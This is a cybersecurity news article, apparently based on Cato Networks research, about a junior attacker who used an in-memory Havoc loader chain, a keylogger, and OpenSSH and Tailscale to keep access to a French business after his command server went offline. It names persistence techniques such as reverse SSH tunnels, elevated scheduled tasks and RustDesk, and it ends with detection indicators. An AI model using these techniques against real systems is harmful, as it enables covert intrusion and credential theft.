Junior Hacker Leverages Tailscale and OpenSSH for Persistent Access After C2 Shutdown
In a recent cybersecurity incident, a French-speaking attacker infiltrated a small automotive business in France, deploying a keylogger to harvest sensitive banking and email credentials. This breach, while seemingly routine, took a notable turn when the attacker implemented a strategy that ensured continued access even after the primary command-and-control (C2) server was taken offline.
Before the C2 server ceased operations, the attacker, known by the handle “Poisson,” installed OpenSSH and Tailscale on the compromised machine. This maneuver created a persistent backdoor that did not rely on the C2 infrastructure. When the Havoc server went dark the following day, Poisson’s access remained intact. Eighteen days later, when the C2 reactivated, the compromised machines automatically reconnected, allowing the attacker to continue operations seamlessly.
Cato Networks meticulously documented this operation, capturing 339 commands executed over 33 days. The attacker inadvertently left behind SSH keys and a detailed playbook in an unsecured storage bucket. This analysis, conducted by Cato CTRL researcher Vitaly Simonovich, provides a rare glimpse into the operational tactics of the attacker, focusing on the commands executed rather than forensic remnants typically analyzed post-breach.
The key takeaway from this incident is clear: simply taking down a C2 server does not equate to effective remediation if the attacker has established alternate access points.
The Profile of Poisson
Poisson is characterized not as an advanced persistent threat (APT) but rather as a junior operator. Researchers noted that his activities followed a school-like schedule, primarily active after 3 p.m. CET, with significant breaks during the day. His operations relied on free-tier services including DuckDNS, Backblaze B2, and an inexpensive IONOS VPS located in Berlin. His operational security was notably weak; he exposed his home directory multiple times, named storage buckets after his handle, and even left a test file containing repeated keystrokes within the keylogger package. Despite these missteps, he successfully compromised four machines.
The Attack Chain
The malware utilized in this attack operated almost entirely in memory. It began with a VBScript stager that included a sandbox-evasion delay, which decrypted a PowerShell loader. This loader subsequently fetched a .NET loader that executed Havoc’s Demon agent without writing the implant to disk. For privilege escalation, Poisson employed the Start-Process -Verb RunAs command, which triggered the Windows User Account Control (UAC) prompt, requiring user interaction to proceed. In one instance, this process required a dozen attempts over two days.
Following initial access, Poisson established a scheduled task that executed at every logon with elevated privileges, injected shellcode into Explorer.exe, and utilized a custom-built RustDesk as a backup communication channel. The keylogger, a concise 70-line Python script, recorded keystrokes to a local file without any beaconing or exfiltration server. Poisson manually retrieved the logged data and adjusted power settings to prevent the machines from entering sleep mode, ensuring uninterrupted data collection.
The Strategic Move
On April 7, during an extensive overnight session, Poisson installed OpenSSH Server and Tailscale, integrating the victim’s machine into his private Tailscale network. This setup enabled key-based SSH access and established a reverse tunnel, allowing him to connect to the machine through Tailscale’s encrypted network without relying on the C2 or exposing any ports.
The following day, the Havoc infrastructure went offline. While the reason for this outage remains unclear, it was inconsequential; the Tailscale connection remained operational, preserving the attacker’s access.
When the C2 resumed on April 26, the compromised machines reconnected automatically, eliminating the need for re-exploitation. Over the next five days, Poisson executed an additional 145 commands, probing smart-card and certificate stores—indicative of his interest in certificate-based logins. He also ran two unidentified executables from a file named Thales.zip for approximately 32 minutes before deleting 17 files and ceasing activity on May 1.
The attacker’s objectives were narrow and focused. He did not deploy tools like Mimikatz for lateral movement or ransomware; instead, he sought specific data: banking logins, email passwords, and access to government portals. For a small business owner, this represents a significant financial risk.
Implications of the Attack
The tools employed by Poisson were not novel, highlighting a concerning trend in cybercrime. Notably, China’s APT31 utilized Tailscale to create covert tunnels from Russian IT firms in 2024 and 2025. Similarly, the group Scattered Spider has leveraged legitimate remote-access tools such as Ngrok and Fleetdeck. RustDesk, which served as Poisson’s backup channel, has also been associated with recent Akira ransomware incidents.
The binaries used in this attack were legitimate and signed, underscoring the challenge of detection methods that focus solely on identifying malicious files rather than monitoring for anomalous behaviors. Poisson’s operation provides concrete evidence that even when a C2 is dismantled, the attacker can maintain access through alternative means, often executed by individuals still refining their skills.
Recommendations for Detection and Prevention
Cato Networks has outlined several key indicators for organizations to monitor:
- Alert for installations of OpenSSH Server on Windows workstations, which are rarely legitimate.
- Monitor for
tailscale.exeon machines that should not require a VPN. - Identify reverse SSH tunnels (
ssh -R) connecting to external hosts. - Check for instances of
wscript.exeexecuting VBScript files from user staging folders. - Flag scheduled tasks set to the highest privileges that initiate script interpreters.
- Watch for changes in
powercfgsettings that prevent machines from entering standby. - Block DuckDNS to mitigate potential abuse.
The overarching lesson is that discovering a C2 should prompt a broader investigation into potential persistence mechanisms that may have been established.
The contents of Thales.zip and the purpose of the two executables run during the attack remain unanswered questions. However, the critical insight is that the C2 was merely one entry point into the network. If it is removed while leaving OpenSSH, Tailscale, the scheduled tasks, and the keylogger intact, the attacker retains a pathway back into the system.
For further insights into the evolving landscape of cyber threats, refer to the original analysis. Source: thehackernews.com.
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
